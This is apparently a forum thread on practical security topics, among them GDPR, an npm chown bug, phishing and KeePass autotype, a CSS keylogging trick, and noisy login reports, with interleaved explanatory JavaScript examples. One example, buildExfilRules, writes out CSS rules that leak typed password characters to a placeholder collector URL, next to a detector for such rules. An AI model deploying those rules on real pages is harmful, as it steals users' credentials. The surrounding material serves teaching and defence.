evil_bunnY
Apr 2, 2003

Jabor posted:

Peep the penalties for non-compliance too. 4% of global turnover (or 20 million euros, if that's a bigger number) if you don't get free and informed consent before doing something.
That’s the kind of penalty they’ll only dish out to egregious/repeat offenders, but yeah gdpr’s got Teeth now.


EssOEss
Oct 23, 2006
128-bit approved

BangersInMyKnickers posted:

Yeah, any of the CAs can do this with a standard signing cert.

I am not entirely sure how this matches with the rest of your reply where you indicate that some elaborate workflow should be set up.

For sure, I appreciate and approve of the need to lock down the private keys because devs are dumb. But I want my automated builds to produce me a new signed copy of my app on every commit, even if that happens every 5 minutes, without any user interaction.

As far as I can tell, this is not possible with the mainstream code signing certificates, which require a dongle with a password that needs manual entering or a physical button that needs pressing. Can you link me to any code signing certificate service that can just install a certificate onto a server (I am fine with it being in a hardware dongle or TPM) that does not need a human to take action to sign code?

Wiggly Wayne DDS
Sep 11, 2010



Truga posted:

I'm in love with GDPR, it's already generating tears and it's not even in effect yet.
the best part is it introducing basic good practices so everyone's emptying email accounts, limiting ppi info flow, improving audit procedures and just cleaning up data archives in general

the security side is going to be a hilarious clusterfuck, but it's helped everything else incidentally

CLAM DOWN
Feb 13, 2007




Truga posted:

I'm in love with GDPR, it's already generating tears and it's not even in effect yet.

It's super good and amazing watching the meltdown over it

DACK FAYDEN
Feb 25, 2013

Bear Witness

EssOEss posted:

Welcome to General Data Protection Regulation, enforced from 25 May 2018. It takes data protection up to eleven across the EU.

GDPR is far more wide-reaching than cookies but here is a decent overview of what it means for cookies:
...
I do not think it affects individual cookies but it does mean that users need to be explicitly informed about what (exactly!) their data is used for. Just "we use cookies to improve our service" does not cut it anymore.
I wonder how this will affect everyone's favorite site?

Pakled posted:

For SA




Very troubling.
(and yes that really is in SA's privacy policy which is listed under "features / articles" because of course it is :allears:)

The Fool
Oct 16, 2003


From another thread:


Proof of concept uses a Chrome Extension, but I can think of some other more insidious delivery methods.

BlankSystemDaemon
Mar 13, 2009



The Fool posted:

Proof of concept uses a Chrome Extension, but I can think of some other more insidious delivery methods.
Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root?

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

D. Ebdrup posted:

Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root?
It's CSS, and someone else came up with the idea of putting it into custom stylesheets for subreddits. So, no.

The Fool
Oct 16, 2003


D. Ebdrup posted:

Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root?

The attack requires you to be able to modify the source of the page you are targeting, or the source of pages being viewed by your target.

The attack works without javascript being turned on and without a form needing to be submitted.

Between Phishing, MITM attacks and compromised servers, there are plenty of ways for an attack like this to get in front of a target.

anthonypants posted:

It's CSS, and someone else came up with the idea of putting it into custom stylesheets for subreddits. So, no.

And yeah, any social media site that allows its users to add custom css.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

The Fool posted:

The attack requires you to be able to modify the source of the page you are targeting, or the source of pages being viewed by your target.

The attack works without javascript being turned on and without a form needing to be submitted.

Between Phishing, MITM attacks and compromised servers, there are plenty of ways for an attack like this to get in front of a target.


And yeah, any social media site that allows its users to add custom css.
Well, Something Awful subforums can have custom CSS themes, but to my knowledge there aren't custom stylesheets for the SA login page. Reddit's got a login form on the sidebar of virtually every page.

duz
Jul 11, 2005

Come on Ilhan, lets go bag us a shitpost


D. Ebdrup posted:

Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root?

The Chrome extension is just because then you don't need the required webserver to show off the exploit.

BlankSystemDaemon
Mar 13, 2009



Fair. I completely missed the point of the exploit.
So, when do we start turning off the internet?

Absurd Alhazred
Mar 27, 2010

by Athanatos
https://twitter.com/bcrypt/status/966775011598987265

FlapYoJacks
Feb 12, 2009
Oh my god. Some major fuckups I can see:

1) They don't label it as -rc#/pre/alpha/whatever.
2) Running "npm update -g npm" installs a PRE-RELEASE VERSION.
3) Their blog post about 5.7.0 doesn't mention it's a pre-release at all.
4) It was marked as a normal SEMVER minor stable release.

Jesus.

Edit, more choice quotes from that thread:

quote:

This isn't a bug, this is all working exactly as written and intended. There's a correctMkdir function that explicitly uses the sudo caller (not the effective or real user ID) to recursively chown any directory it is called to, and then this function is used all over the place, notably in places like the installation etc directory.

Apparently, the npm developers feel they can do whatever they want with your system. Seriously, this isn't a subtle bug, this is code doing exactly what it claims to do. Which is stupid and clearly nobody tested this on a real system.

quote:

Not a single pull request was merged in the last 2 months that came from an outside contributor. There are currently over 70 PRs open and none of them have any activity from the npm team.

EDIT: Last merged PR from an outsider was back in November.

FlapYoJacks fucked around with this message at 13:20 on Feb 23, 2018
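
Added example, a model and not npm's code: what "recursively chown the directory you were called on, to the sudo caller's uid" does to a tree that already existed, next to the least-privilege version that only chowns what the call itself created. Ownership is tracked in a plain object mapping path to uid, the directory tree in the check is constructed, and the environment-variable lookup is the only place the "sudo caller" choice the quoted report describes is made.

```javascript
// Added example, a model and not npm's code: "make a directory and hand it to
// the invoking user" done two ways.  Ownership is a plain object path -> uid.
const ROOT_UID = 0;

function ancestors(dir) {
  // "/usr/local/lib" -> ["/usr", "/usr/local", "/usr/local/lib"]
  const parts = dir.split("/").filter(Boolean);
  return parts.map((_, i) => "/" + parts.slice(0, i + 1).join("/"));
}

// The uid the quoted report says was used: the sudo caller, not the real or
// effective uid of the running process.
function sudoCallerUid(env) {
  return env.SUDO_UID !== undefined ? Number(env.SUDO_UID) : ROOT_UID;
}

// Behaviour the report describes: mkdir -p the target, then chown -R it to
// `uid`, whether or not anything under it was created by this call.  Run as
// root under sudo, this hands pre-existing system-owned subtrees to the user.
function mkdirpChownRecursive(tree, dir, uid) {
  for (const p of ancestors(dir)) if (!(p in tree)) tree[p] = ROOT_UID; // created as root
  for (const p of Object.keys(tree)) {
    if (p === dir || p.startsWith(dir + "/")) tree[p] = uid;          // unconditional chown -R
  }
  return tree;
}

// Least-privilege version: chown only entries this call created; anything that
// already existed keeps its owner.
function mkdirpChownCreated(tree, dir, uid) {
  for (const p of ancestors(dir)) if (!(p in tree)) tree[p] = uid;
  return tree;
}

// Entries that were root-owned before and are not afterwards, sorted.
function demotedFromRoot(before, after) {
  return Object.keys(after)
    .filter(p => before[p] === ROOT_UID && after[p] !== ROOT_UID)
    .sort();
}
```

The model only tracks ownership, not permission bits, so it understates the damage: in the recursive variant any file under the target becomes writable by the unprivileged user as well, which is the "installation etc directory" point in the quote.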

Docjowles
Apr 9, 2009

Yeah the dev team quadrupling down on this, insisting this is not a bug and anyone who installed this pre release version (that was announced on their blog, is in no way labeled as pre release, and loving auto installs when you run a normal update command) had it coming is just amazing to behold :allears:

Who’d have guessed that the leftpad fiasco wouldn’t be the dumbest thing to come out of the Node community in the last couple years.

Kerning Chameleon
Apr 8, 2015

by Cyrano4747
I'm a bit lost these days as to how I'm supposed to idiot-proof my setup so I don't get phished. I do most of what I'm supposed to: sensitive stuff like financials and secondary emails is only logged into on my Linux install, Firefox has the paranoia plugins (adnauseum and uMatrix), the hosts file is configured to autoupdate from the winhelp2002 list, and I use Keepass to browse to and auto-type login to the accounts (don't even type them in myself or use bookmarks, for fear of malignant typos or hijacked bookmarks).

The issue I have is this: I'm forced to rely on Google Authenticate for my 2FA since I can count the number of services I use that currently can use U2F on one finger, and poo poo like my bank has apparently never heard of 2-factor to begin with regardless. That leaves me to rely on Keepass to stop me from handing over my credentials to a phony website. The problem is that, out of the box, it's poo poo at this: It only pays attention to make sure the right word is in the title bar; it doesn't care at all about what the url says. I tried to use a plugin ages ago that prints the domain part in the title bar, but I discovered Keepass doesn't care about that either (and that plugin didn't survive the Quantum update anyway).

I'm a bit stymied, since the obvious answer would be "get a Keepass plugin for Firefox", but I can't do that due to the whole Autofill Phish issue, in addition to all the other security concerns those kinds of browser plug-ins have. Is there a Keepass plug-in or setting I'm missing here, or is the answer really just "pay attention to the url bar and don't be an idiot"?

Stanley Pain
Jun 16, 2001

by Fluffdaddy
It's really easy not to get phished.

Manually enter the URL all the time, double check the spelling, check the certificate, then input your credentials from Keepass or whatever. It's really not that hard.

andrew smash
Jun 26, 2006

smooth soul
I keep urls stored in the url field in the relevant keepass database entry and tell keepass to “open in browser”. Am I owning myself?

Kerning Chameleon
Apr 8, 2015

by Cyrano4747

andrew smash posted:

I keep urls stored in the url field in the relevant keepass database entry and tell keepass to “open in browser”. Am I owning myself?

Yeah, that's what I'm doing, too. I think I'm doing everything right, but that just means I'm more likely to miss a pretty big gap in my login ritual if one exists.

evil_bunnY
Apr 2, 2003

andrew smash posted:

I keep urls stored in the url field in the relevant keepass database entry and tell keepass to “open in browser”. Am I owning myself?
No. I think it’s better because it protects you from typos.

Stanley Pain
Jun 16, 2001

by Fluffdaddy
Or just keep the URLs in a text file to copy/paste, until someone hacks your URLS.txt file...

AlternateAccount
Apr 25, 2005
FYGM
So we get "analysts" from our security team sending us giant exports of "SUSPICIOUS LOGIN ACTIVITY ON EXECUTIVE ACCOUNTS." Most of the time it's just page after page of BAD PASSWORD. They expect me to somehow grill our C-levels about whether or not it was them. No. I am not doing that.
If our crack security team can't somehow suss out where these logins are coming from and do some investigation without dealing with the spotty memory of the end user, wtf are they going to do if I come back and say yep, they say they were sleeping at this time. OK? NOW WHAT?

loving clowns.

ElCondemn
Aug 7, 2005


EssOEss posted:

I am not entirely sure how this matches with the rest of your reply where you indicate that some elaborate workflow should be set up.

For sure, I appreciate and approve of the need to lock down the private keys because devs are dumb. But I want my automated builds to produce me a new signed copy of my app on every commit, even if that happens every 5 minutes, without any user interaction.

As far as I can tell, this is not possible with the mainstream code signing certificates, which require a dongle with a password that needs manual entering or a physical button that needs pressing. Can you link me to any code signing certificate service that can just install a certificate onto a server (I am fine with it being in a hardware dongle or TPM) that does not need a human to take action to sign code?

You can definitely just get a signing cert without any dongles or passwords. But you’re the exact reason these out of band signing practices exist, talk to your ops/security team to set this up. You should store your signing keys in an encrypted audited way using something like vault. During your build pipeline you’d grab the private key from your key store and sign your code.

But I’m a bit wary of this method, how often are you releasing builds to the public? Only your GA public releases should be signed, you shouldn’t automatically sign every build that comes from your build pipeline.

Pile Of Garbage
May 28, 2007




Your focus should be less on prevention and more on mitigation. Phishing attacks exploit humans which are imperfect and certainly not infallible systems. No matter how careful you are falling victim to phishing is really an inevitability given sufficient time. So, what you want to focus on is mitigating the impact of your credentials being compromised.

From the sound of it you're already taking the right steps, specifically using different credentials for each website and enabling 2FA wherever possible. Beyond that I guess you could deliberately change the passwords for all your accounts on a schedule however that would be a PITA.

Honestly you're already doing more than can be expected so maybe chill out a bit?

AlternateAccount posted:

So we get "analysts" from our security team sending us giant exports of "SUSPICIOUS LOGIN ACTIVITY ON EXECUTIVE ACCOUNTS." Most of the time it's just page after page of BAD PASSWORD. They expect me to somehow grill our C-levels about whether or not it was them. No. I am not doing that.
If our crack security team can't somehow suss out where these logins are coming from and do some investigation without dealing with the spotty memory of the end user, wtf are they going to do if I come back and say yep, they say they were sleeping at this time. OK? NOW WHAT?

loving clowns.

Sounds like they're just running garbage-tier reports against your environment that identify things like "X account failed auth Y number of times in period Z". You wouldn't perchance be relying on a BPO for security operations stuff? Either way tell them to stop running rubbish Nessus reports and get a proper SIEM appliance that's configured to do correlation and analysis to actually identify real risks.
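
Added example, not from either poster: the difference between the report described above (failures per account, no context) and two correlation rules that need more than one event before they alert. The log lines are constructed, in a made-up one-line-per-attempt format; the thresholds are illustrative defaults.

```javascript
// Added example, not from the thread.  Constructed auth log, one attempt per line.
const SAMPLE_LOG = `
2018-02-23T09:00:01Z auth user=ceo src=203.0.113.10 result=FAIL
2018-02-23T09:00:05Z auth user=ceo src=203.0.113.10 result=FAIL
2018-02-23T09:00:09Z auth user=ceo src=203.0.113.10 result=FAIL
2018-02-23T09:00:14Z auth user=ceo src=203.0.113.10 result=OK
2018-02-23T09:10:00Z auth user=cfo src=198.51.100.7 result=FAIL
2018-02-23T09:10:01Z auth user=cto src=198.51.100.7 result=FAIL
2018-02-23T09:10:02Z auth user=coo src=198.51.100.7 result=FAIL
2018-02-23T09:10:03Z auth user=ceo src=198.51.100.7 result=FAIL
2018-02-23T11:00:00Z auth user=cfo src=192.0.2.44 result=FAIL
2018-02-23T11:00:30Z auth user=cfo src=192.0.2.44 result=FAIL
2018-02-23T11:01:00Z auth user=cfo src=192.0.2.44 result=OK
`.trim();

function parseLine(line) {
  const m = /^(\S+) auth user=(\S+) src=(\S+) result=(OK|FAIL)$/.exec(line.trim());
  return m ? { ts: Date.parse(m[1]), user: m[2], src: m[3], ok: m[4] === "OK" } : null;
}

function parseLog(text) {
  return text.split("\n").map(parseLine).filter(Boolean).sort((a, b) => a.ts - b.ts);
}

// The report the post complains about: failures per account, nothing else.
// It ranks the CFO who mistyped a password twice next to an account under attack.
function failureCounts(text) {
  const counts = {};
  for (const e of parseLog(text)) if (!e.ok) counts[e.user] = (counts[e.user] || 0) + 1;
  return counts;
}

// Two rules that combine events before alerting.
function correlate(text, { minFailures = 3, windowMs = 10 * 60 * 1000, sprayAccounts = 3 } = {}) {
  const events = parseLog(text);
  const alerts = [];

  // Rule 1: a success preceded by >= minFailures failures for the same user
  // from the same source inside the window.  A couple of typos then a login
  // is normal; a run of failures that ends in success is worth a look.
  const pending = new Map(); // "user|src" -> timestamps of recent failures
  for (const e of events) {
    const key = `${e.user}|${e.src}`;
    const fails = (pending.get(key) || []).filter(t => e.ts - t <= windowMs);
    if (e.ok) {
      if (fails.length >= minFailures) {
        alerts.push({ rule: "success-after-failures", user: e.user, src: e.src, failures: fails.length });
      }
      pending.set(key, []);
    } else {
      fails.push(e.ts);
      pending.set(key, fails);
    }
  }

  // Rule 2: password spray, one source failing against many distinct accounts
  // inside the window.  Per-account counts never see this: each account fails once.
  const failsBySrc = new Map();
  for (const e of events) {
    if (e.ok) continue;
    if (!failsBySrc.has(e.src)) failsBySrc.set(e.src, []);
    failsBySrc.get(e.src).push(e);
  }
  for (const [src, fails] of failsBySrc) {
    for (let i = 0; i < fails.length; i++) {
      const users = new Set();
      for (let j = i; j < fails.length && fails[j].ts - fails[i].ts <= windowMs; j++) users.add(fails[j].user);
      if (users.size >= sprayAccounts) {
        alerts.push({ rule: "password-spray", src, accounts: [...users].sort() });
        break;
      }
    }
  }
  return alerts;
}
```

On the sample, failureCounts flags every executive including the one who mistyped twice and then logged in, which is the "page after page of BAD PASSWORD" export; correlate produces two alerts, each with the source address attached, which is what the security team should be sending in the first place.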

Rufus Ping
Dec 27, 2006





I'm a Friend of Rodney Nano

Kerning Chameleon posted:

I'm a bit lost these days as to how I'm supposed to idiot-proof my setup so I don't get phished. I do most of what I'm supposed to: sensitive stuff like financials and secondary emails is only logged into on my Linux install,
overkill

Kerning Chameleon posted:

Firefox has the paranoia plugins (adnauseum


you loving what lol

Kerning Chameleon posted:

and uMatrix), the hosts file is configured to autoupdate from the winhelp2002 list

you're automatically grabbing a file over http and inserting it into your hosts file?

Kerning Chameleon posted:

, and I use Keepass to browse to and auto-type login to the accounts (don't even type them in myself or use bookmarks, for fear of malignant typos or hijacked bookmarks).

please explain what a hijacked bookmark is and how it occurs

Kerning Chameleon posted:

The issue I have is this: I'm forced to rely on Google Authenticate for my 2FA

good

Kerning Chameleon posted:

since I can count the number of services I use that currently can use U2F on one finger, and poo poo like my bank has apparently never heard of 2-factor to begin with regardless.

an unfortunate reality with some banks yeah

Kerning Chameleon posted:

That leaves me to rely on Keepass to stop me from handing over my credentials to a phony website. The problem is that, out of the box, it's poo poo at this: It only pays attention to make sure the right word is in the title bar; it doesn't care at all about what the url says.

so keepass relies on something under the control of an adversary (the page title). your security depends on a phishing page not having the name of the site it's impersonating in the <title>

this is incredibly stupid and you should not use software that works this way

Kerning Chameleon posted:

I tried to use a plugin ages ago that prints the domain part in the title bar, but I discovered Keepass doesn't care about that either (and that plugin didn't survive the Quantum update anyway).

I'm a bit stymied, since the obvious answer would be "get a Keepass plugin for Firefox",

the obvious answer is to use 1password

Kerning Chameleon posted:

but I can't do that due to the whole Autofill Phish issue,

this is solved, in so far as it is possible, by disabling autofill in your password manager (and blocking ads)

Kerning Chameleon posted:


in addition to all the other security concerns those kinds of browser plug-ins have.

some password managers have a significantly better track record than others

Kerning Chameleon posted:


Is there a Keepass plug-in or setting I'm missing here, or is the answer really just "pay attention to the url bar and don't be an idiot"?

you shouldn't have to install third party plugins or match the address bar using your own eyes. if your password manager can't do this, you should use a proper one that does

Kerning Chameleon
Apr 8, 2015

by Cyrano4747

cheese-cube posted:

Your focus should be less on prevention and more on mitigation. Phishing attacks exploit humans which are imperfect and certainly not infallible systems. No matter how careful you are falling victim to phishing is really an inevitability given sufficient time. So, what you want to focus on is mitigating the impact of your credentials being compromised.

From the sound of it you're already taking the right steps, specifically using different credentials for each website and enabling 2FA wherever possible. Beyond that I guess you could deliberately change the passwords for all your accounts on a schedule however that would be a PITA.

Yeah, I do an annual refresh of most of my account passwords (in fact, mine is coming up in a few days). Several hours out of my day, but hey, it's a bit of peace of mind any plaintext account breaches in the prior year are nullified. I'm sure we could have a long, pedantic debate about what a "good" length such a cycle should be, but I figure on top of all the rest of what I do a year is decent enough period to refresh on.

quote:

Honestly you're already doing more than can be expected so maybe chill out a bit?

Sorry, it's just my SSN was (probably) breached last year (in March, in a separate breach from the big stupid Equifax breach that sent everyone in a tizzy), which rocketed my already high baseline paranoia to near-tinfoil hat levels. I was convinced I was missing something, so I decided to lay it all out to people far more on the ball about it than me to find what the big stupid obvious pitfall I was missing was.

The real silver bullet for phishing is, duh, for sites to stop being stupid/lazy and just implement U2F already. My issue is that even if that happens, you still need a way to authenticate on mobile phones (which, remember, are most people's primary computing devices these days), and even Yubikey's $50 stick (which is actually $100 since you obviously want to keep a backup in your safe) only additionally authenticates on Android phones that are whiz-bangy enough to have NFC, and of course iPhone users are just poo poo out of luck. That means until that hardware issue is resolved, you need to suggest to users to use HOTP/TOTP apps anyway to let their phones in... which just opens you back up to phishing again ("Hello, we detected a security issue and need to authenticate your account, please enter your code/press okay in your auth app..."). It's much like how also having SMS in addition to 2FA-app/U2F defeats the purpose of those, just without getting overworked telecom operators involved.

Rufus Ping posted:

you're automatically grabbing a file over http and inserting it into your hosts file?

It's this hosts file, autoupdated using this script.

Honestly, I'm not a fan of the setup myself either, and I'm considering just ripping out the script and updating the hosts on my Linux install manually too, like I do on Windows.

quote:

please explain what a hijacked bookmark is and how it occurs

A theoretical scenario outline here:

quote:

Using a bookmark of some sort is an acceptable approach as well, because you're going to a site/page/URL that you know is correct, because you saved it earlier from a known safe visit to that site. Use that, and it's pretty much the same as having typed in by hand.

In either case, you'll have sidestepped the phishing attempt simply by not clicking on a link in email or on some other site that was questionable, but somehow entering it yourself.

However, in theory, things could still be compromised in other ways.

As one example: a virus infecting your machine could alter your bookmarks. Use the bookmark you thought was for your bank, and you might get taken to a phishing site. For the record, I've not heard of any virus that actually does this, probably because once you've been infected there are simpler approaches to redirecting you to a phishing site.

Again, especially with my other precautions, an extremely unlikely scenario, I have much more to fear from an errant keylogger, but still.

Impotence
Nov 8, 2010
Lipstick Apathy
FYI if you have malware on your computer that can modify your browser's data, that means it can already hook into it to read POSTDATA contents pre-encryption and post-decryption, so visiting the actual site isn't even safe anymore, your bookmarks are meaningless here, you'll just get webinject/formgrabbed from the legitimate website with legitimate certificate.

The Fool
Oct 16, 2003


Or, using the CSS exploit from yesterday, just keylog whatever you type into a form even if you don't submit it.

Impotence
Nov 8, 2010
Lipstick Apathy
I'm at least somewhat certain that those CSS selectors will not fire on standard input type eq password fields, since you can't get a value="" out of them, but they will fire if you're using some framework like react or angular that binds value="" to some other model
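
Added example, not from the thread and not the linked proof of concept: the shape of the CSS rule the last few posts are talking about, and a check a site that accepts user-submitted stylesheets (a subforum skin, a subreddit theme) could run before saving one. The collector URL and the sample stylesheets are placeholders constructed here.

```javascript
// Added example, not from the thread.  Collector URL is a placeholder.
const CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789";

// Attacker side.  One rule per character: the selector matches only while the
// element's `value` *attribute* ends with that character, and the matching
// rule's background-image makes the browser fetch a URL carrying it.  No
// JavaScript and no submit; the keystroke leaks as the attribute changes.
function buildExfilRules(endpoint, charset = CHARSET, selector = "input[type=password]") {
  return Array.from(charset)
    .map(ch => `${selector}[value$="${ch}"] { background-image: url("${endpoint}?c=${encodeURIComponent(ch)}"); }`)
    .join("\n");
}

// Defender side: flag any rule whose selector tests a value attribute and
// whose body loads a URL.  A regex over a flat stylesheet, not a CSS parser;
// nested @media blocks would need a real one.
const VALUE_SELECTOR = /\[\s*value\s*[\^\$\*\|~]?=/i;
const LOADS_URL = /url\s*\(/i;

function findExfilRules(css) {
  const flagged = [];
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    const selector = m[1].trim();
    if (VALUE_SELECTOR.test(selector) && LOADS_URL.test(m[2])) flagged.push(selector);
  }
  return flagged;
}
```

The caveat in the post above is the reason the attacker side targets the attribute: typing into a plain input changes the element's value property, and attribute selectors never see that, so the rules stay dormant. A framework that re-renders the field with value={state} on every keystroke writes the attribute too, and then every rule fires in turn. That is also why blocking the rules at upload time is the cheap fix for a site with user CSS: the check does not need to know which pages use which framework.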

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Kerning Chameleon posted:

Rufus Ping posted:

you're automatically grabbing a file over http and inserting it into your hosts file?
It's this hosts file, autoupdated using this script.
You could've just said yes?

Thermopyle
Jul 1, 2003

...the stupid are cocksure while the intelligent are full of doubt. —Bertrand Russell

Kerning Chameleon posted:

I'm a bit lost these days as to how I'm supposed to idiot-proof my setup so I don't get phished. I do most of what I'm supposed to: sensitive stuff like financials and secondary emails is only logged into on my Linux install, Firefox has the paranoia plugins (adnauseum and uMatrix), the hosts file is configured to autoupdate from the winhelp2002 list, and I use Keepass to browse to and auto-type login to the accounts (don't even type them in myself or use bookmarks, for fear of malignant typos or hijacked bookmarks).

The issue I have is this: I'm forced to rely on Google Authenticate for my 2FA since I can count the number of services I use that currently can use U2F on one finger, and poo poo like my bank has apparently never heard of 2-factor to begin with regardless. That leaves me to rely on Keepass to stop me from handing over my credentials to a phony website. The problem is that, out of the box, it's poo poo at this: It only pays attention to make sure the right word is in the title bar; it doesn't care at all about what the url says. I tried to use a plugin ages ago that prints the domain part in the title bar, but I discovered Keepass doesn't care about that either (and that plugin didn't survive the Quantum update anyway).

I'm a bit stymied, since the obvious answer would be "get a Keepass plugin for Firefox", but I can't do that due to the whole Autofill Phish issue, in addition to all the other security concerns those kinds of browser plug-ins have. Is there a Keepass plug-in or setting I'm missing here, or is the answer really just "pay attention to the url bar and don't be an idiot"?

All of this is weird and stupid.

Just don't put your password into the wrong site.

Stanley Pain
Jun 16, 2001

by Fluffdaddy
And I thought I was being paranoid using DNS blacklists (a la Pi Hole but not Pi Hole) on my Edgerouter, which inevitably pissed off my wife because she couldn't click on her email links because they went through list-manage.com or some poo poo. That's my story for today.

Rufus Ping
Dec 27, 2006





I'm a Friend of Rodney Nano

Kerning Chameleon posted:

Rufus Ping posted:

you're automatically grabbing a file over http and inserting it into your hosts file?

It's this hosts file, autoupdated using this script.

that's a yes then

Kerning Chameleon posted:

A theoretical scenario outline here:

you're hosed anyway if something gets the privs to do this

Impotence
Nov 8, 2010
Lipstick Apathy
I don't think I have ever seen any malware in the wild do that, fwiw

Volguus
Mar 3, 2009

I am a bit lost too: why do you need a browser plugin? What's wrong with the desktop application? You can copy and paste usernames and passwords from it into the appropriate login forms, never having to worry about automation making a mistake.

Wiggly Wayne DDS
Sep 11, 2010



but what if the password manager gets phished?

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
By the way whoever came up with the hosts file that guy is using is definitely smart and good at computers and absolutely not a crank


Kerning Chameleon
Apr 8, 2015

by Cyrano4747

Volguus posted:

I am a bit lost too: why do you need a browser plugin? What's wrong with the desktop application? You can copy and paste usernames and passwords from it into the appropriate login forms, never having to worry about automation making a mistake.

Keyloggers can grab from your clipboard. Autotype helps make the keylogger's job more difficult. Additionally, the password manager is supposed to not shortcut autotype on fake websites: if I use the autotype shortcut on a site while my Keepass archive is open, and the site title doesn't have any words that match the site name in the archive, the autotype won't fire, and I have to manually go into the program and click the autotype button there to do it. This is supposed to make me, the user, use that time to stop and think why the manager isn't performing autotype on this site.

The problem is Keepass relies on <title>, not the actual URL for this, despite the fact you can enter the url in a dedicated field in the credential entry in the archive (and you can even browse to the site with it).
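
Added example, not KeePass code: what the title match described above and an origin match each let through, with the URL shapes a phishing page would use. The entry, window titles and page URLs are constructed; the origin check is the one a browser-integrated manager can do because it sees the real address bar, not a window title the page chose.

```javascript
// Added example, not KeePass code.  Entry and inputs are constructed.
const ENTRY = { name: "Example Bank", url: "https://online.examplebank.example/login" };

// Title matching as the thread describes it: autotype fires when the entry
// name appears in the window title.  A phishing page sets its own <title>.
function titleMatches(entry, windowTitle) {
  return windowTitle.toLowerCase().includes(entry.name.toLowerCase());
}

// Origin matching: accept only https, and only the stored host or a subdomain
// of it.  Anything an attacker puts in front of the real host (userinfo, a
// lookalike prefix, the real host as a label inside their own domain) fails,
// because URL parsing gives the real hostname and the suffix test is anchored.
function originMatches(entry, pageUrl) {
  let stored, page;
  try {
    stored = new URL(entry.url);
    page = new URL(pageUrl);
  } catch (e) {
    return false; // unparsable: do not fill
  }
  if (page.protocol !== "https:" || stored.protocol !== "https:") return false;
  const s = stored.hostname.toLowerCase();
  const p = page.hostname.toLowerCase();
  return p === s || p.endsWith("." + s);
}

// Run both checks over a list of {title, url} pages and report which would
// have received the credentials under each policy.
function fillDecisions(entry, pages) {
  return pages.map(pg => ({
    url: pg.url,
    byTitle: titleMatches(entry, pg.title),
    byOrigin: originMatches(entry, pg.url),
  }));
}
```

The subdomain rule is deliberately the loose end here: it means an attacker who controls any host under examplebank.example gets the fill. Managers that want to be stricter store the exact host and match only that.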

Impotence
Nov 8, 2010
Lipstick Apathy

Kerning Chameleon posted:

Keyloggers can grab from your clipboard. Autotype helps make the keylogger's job more difficult. Additionally, the password manager is supposed to not shortcut autotype on fake websites: if I use the autotype shortcut on a site while my Keepass archive is open, and the site title doesn't have any words that match the site name in the archive, the autotype won't fire, and I have to manually go into the program and click the autotype button there to do it. This is supposed to make me, the user, use that time to stop and think why the manager isn't performing autotype on this site.

The problem is Keepass relies on <title>, not the actual URL for this, despite the fact you can enter the url in a dedicated field in the credential entry in the archive (and you can even browse to the site with it).

Much password stealing malware will just outright take it out of memory or via formgrabbing, directly copy out of browser password saved db, etc.

Don't typically care about autotype, how you type it in, if you copy it in - they just see "POST /login Host: example.com username=x&password=y", or otherwise

Again, once you have malware running on the same privilege level or better, all bets are off anyway and you have much bigger issues. Using an encrypted at rest password manager won't save you because it can just copy the entire unpacked db when you open it.


(that being said, I use keepass without autotype and without URLs saved, and no browser plugin & find it useful)

Impotence fucked around with this message at 20:54 on Feb 23, 2018


Kerning Chameleon
Apr 8, 2015

by Cyrano4747

Biowarfare posted:

Much password stealing malware will just outright take it out of memory or via formgrabbing, directly copy out of browser password saved db, etc.

Don't typically care about autotype, how you type it in, if you copy it in - they just see "POST /login Host: example.com username=x&password=y", or otherwise

Again, once you have malware running on the same privilege level or better, all bets are off anyway and you have much bigger issues. Using an encrypted at rest password manager won't save you because it can just copy the entire unpacked db when you open it.


(that being said, I use keepass without autotype and without URLs saved, and no browser plugin & find it useful)

Yes, that's why I only sign in my sensitive accounts on my seldom-used-otherwise-Linux-install: the probability of a Linux-based malware getting through the various adblockers and getting root is far lower than that I just screw up and somehow open up a Linux-based malware from an email attachment instead. At the point we're talking about, I'd probably be dealing with targeted attacks from nation-state actors, so I shouldn't worry anyway because then my rear end is grass no matter what, but it still made me uneasy to be doing so well on the big stuff and then just be lax about the little things.
